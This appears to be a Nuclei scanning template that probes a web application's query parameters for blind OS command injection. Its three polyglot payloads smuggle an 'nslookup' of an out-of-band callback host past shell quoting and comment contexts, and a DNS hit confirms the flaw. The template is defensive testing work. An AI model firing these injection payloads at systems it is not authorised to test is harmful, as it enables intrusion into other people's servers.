id: cmdi-blind-oast-polyglot

info:
  name: Blind OS Command Injection
  author: pdteam
  severity: high
  description: |
    OS Commanding is the direct result of mixing trusted code and untrusted data.
    This attack is possible when an application accepts untrusted input to build operating system commands in an insecure manner involving improper data sanitization,
    and/or improper calling of external programs.
  reference:
    - https://portswigger.net/research/hunting-asynchronous-vulnerabilities
    - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Command%20Injection/README.md
  tags: cmdi,oast,dast,blind,polyglot

variables:
  marker: "{{interactsh-url}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    payloads:
      interaction:
        - "&nslookup {{marker}}&'\\\"`0&nslookup {{marker}}&`'"
        - "1;nslookup${IFS}{{marker}};#${IFS}';nslookup${IFS}{{marker}};#${IFS}\";nslookup${IFS}{{marker}};#${IFS}"
        - "/*$(nslookup {{marker}})`nslookup {{marker}}``*/-nslookup({{marker}})-'/*$(nslookup {{marker}})`nslookup {{marker}}` #*/-nslookup({{marker}})||'\"||nslookup({{marker}})||\"/*`*/"

    fuzzing:
      - part: query
        type: postfix
        fuzz:
          - "{{interaction}}"

    stop-at-first-match: true
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
